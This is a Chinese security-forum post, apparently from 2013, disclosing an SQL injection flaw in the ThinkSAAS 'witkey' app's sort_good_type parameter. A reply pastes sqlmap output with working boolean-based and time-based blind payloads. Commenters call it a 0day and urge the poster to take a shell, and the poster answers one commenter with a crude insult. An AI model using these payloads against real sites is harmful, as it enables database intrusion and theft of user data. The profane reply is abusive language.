thinksaas

2013-04-08 13:37:07 21 Rices 4787

http://xxxxxxxxxxxxx/index.php?app=witkey&ac=index&sort_industry=&sort_good_type=2[sql]

over

类别 Web安全

关于作者

Rices154篇文章2133篇回复

评论21次

要评论？请先登录或注册

21楼

hang333
2013-4-12 14:48

楼主试试看拿Shell～～

回复|@ta|踩(0)|顶(0)
20楼

a1258771
2013-4-9 19:47

撸主。。。求求求。。。。。。。。。

回复|@ta|踩(0)|顶(0)
19楼

xiaopeng
2013-4-9 19:22

楼主头像才是亮点，，哈哈

回复|@ta|踩(0)|顶(0)
18楼

biying
2013-4-9 15:47

回复|@ta|踩(0)|顶(0)
17楼

kimdle
2013-4-9 14:04

LZ好样的！！！

回复|@ta|踩(0)|顶(0)

16楼

Rank: 1

2013-4-9 11:16

sqlmap跑了下

sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: sort_good_type     Type: boolean-based blind     Title: AND boolean-based blind - WHERE or HAVING clause     Payload: app=witkey&ac=index&sort_industry=&sort_good_type=2 AND 7672=7672&sort_day=&sort_price=&sort_addtime=      Type: AND/OR time-based blind     Title: MySQL > 5.0.11 AND time-based blind     Payload: app=witkey&ac=index&sort_industry=&sort_good_type=2 AND SLEEP(5)&sort_day=&sort_price=&sort_addtime= ---

回复|@ta|踩(0)|顶(0)

15楼

H4xssck3r
2013-4-9 09:26

简单明了，GOOD

回复|@ta|踩(0)|顶(0)
14楼

csser
2013-4-9 00:02

最直接的0day

回复|@ta|踩(0)|顶(0)
13楼

l14of
2013-4-8 23:58

这个App官网米有。

回复|@ta|踩(0)|顶(0)
12楼

xuehei
2013-4-8 23:00

rices ~~~大牛牛~~一直关注着你·~·

回复|@ta|踩(0)|顶(0)
11楼

XiaoMie
2013-4-8 22:02

文章简洁明了甚是喜欢

回复|@ta|踩(0)|顶(0)
10楼

0xcodede
2013-4-8 20:03

这个很干脆

回复|@ta|踩(0)|顶(0)
9楼

飞云小哥哥
2013-4-8 18:10

撸主v5

回复|@ta|踩(0)|顶(0)
8楼

M3loee
2013-4-8 17:24

呆b

回复|@ta|踩(0)|顶(0)
7楼

牧童
2013-4-8 15:59

嘿，Rices大牛发火了，后果很严重~~~~~~~

回复|@ta|踩(0)|顶(0)
6楼

爱绱hack
2013-4-8 15:49

撸过咯！　顶起

回复|@ta|踩(0)|顶(0)
5楼

nowake
2013-4-8 15:22

挖洞比赛。。。

回复|@ta|踩(0)|顶(0)
4楼

package
2013-4-8 14:38

你惹到 Rices牛了

回复|@ta|踩(0)|顶(0)
3楼

Rices
2013-4-8 14:23

艹你爹.

回复|@ta|踩(0)|顶(0)
2楼

M3loee
2013-4-8 14:22

撸主对wy一往情深有木有，都用来做头像了

回复|@ta|踩(0)|顶(0)

热门文章

安全资讯大疆扫地机被Claude Code逆向并发掘漏洞可远程控制扫地机目前已修复

多数智能扫地机都附带摄像头和远程控制功能，并且多数核心功能还 ...

2026-02-27 01:35:06 7 935

安全资讯2024-2025 年最新网络黑客攻击技术综合报告

# 2024-2025 年最新网络黑客攻击技术综合报告## 引言随着数字化 ...

2026-01-09 04:17:52 6 2506

渗透测试记一次SEO引流后门的webshell应急响应样本分析

写在最前：由于工作性质，不写具体事件前后经过，本贴只对攻击者 ...

2026-02-02 09:31:19 35 2205

安全资讯Anthropic称中国AI公司利用1600万次Claude查询复制模型

Anthropic周一表示，它发现了由三家人工智能(AI)公司DeepSeek、M ...

2026-02-25 05:57:55 6 1006

安全资讯霍尼韦尔关键基础设施闭路电视监控系统存在身份验证绕过漏洞

美国网络安全和基础设施安全局 (CISA) 警告称，多款霍尼韦尔闭路 ...

2026-02-20 00:43:43 6 1040

精华推荐

逆向破解微信PC端技术研究(2)-拿下聊天语音

> 微信PC端技术研究-保存聊天语音> by anhkgg> 2019年1月31日### ...

2019-02-02 13:19:51 37 1804

渗透测试1.6K主机全域沦陷实录：从单点突破到域控接管的终极横向渗透链

声明一下：如果您在读文章的时候，图片与描述不符，或者不对的地 ...

2025-04-05 08:52:04 56 1989

渗透测试【保姆级教学】某金融app FRIDA hook加解密算法+jsrpc=乱杀

## 0x01 APP渗透测试因为是经过授权的测试，所以拿到的这个包是 ...

2023-03-16 19:10:08 92 30354

渗透测试从零起步开发Rootkit：内核空间初探

首发t00ls作者小飞0x01 写在前面相信大部分人和我一样，觉 ...

2015-07-08 22:30:07 21 11834

渗透测试VBS操作二进制数据，以及一些杂七杂八

drops和谐前看到lcx牛发表的《昨日黄花--vbscript》，里面提到了 ...

2016-07-24 01:57:36 17 556

Top ↑